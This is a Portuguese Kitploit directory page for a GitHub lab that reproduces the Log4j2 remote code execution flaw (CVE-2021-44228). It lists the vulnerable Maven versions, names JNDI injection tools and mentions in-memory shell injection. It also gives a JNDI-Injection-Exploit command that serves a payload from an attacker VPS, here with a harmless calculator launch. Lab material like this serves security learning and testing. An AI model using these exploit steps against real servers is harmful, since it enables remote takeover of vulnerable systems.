Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-Log4j2-RCE — Apache Log4j2 RCE( CVE-2021-44228) Ambiente de verificação | Kitploit
Ferramentas/GitHubGitHub/1in9e/apache-log4j2-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE( CVE-2021-44228) Ambiente de verificação

Ver Repositório
21há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ambiente de Verificação RCE do Apache Log4j2

Desde 2021.12.09

Algumas Referências

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

Configuração do Ambiente

Importar os pacotes relevantes do Maven e a faixa de versões vulneráveis

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

Verificação

Usar dnslog para detectar se está sendo utilizado

0

ldap combinado com jndi para RCE

Relacionado à versão do JDK, após JDK 11.0.1, 8u191, 7u201, 6u211 é necessário definir manualmente trustURLCodebase como true

Para aprendizado detalhado sobre isso, consulte https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

Método de exploração, pode ser combinado com ferramentas de injeção jndi, como JNDI-Injection-Exploit, fastjson_rce_tool, JNDIExploit

Também é possível combinar ferramentas para implementar vários métodos públicos de echo e injeção de shell na memória

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

Sobre

https://github.com/apache/logging-log4j2/tags

Baixar ferramenta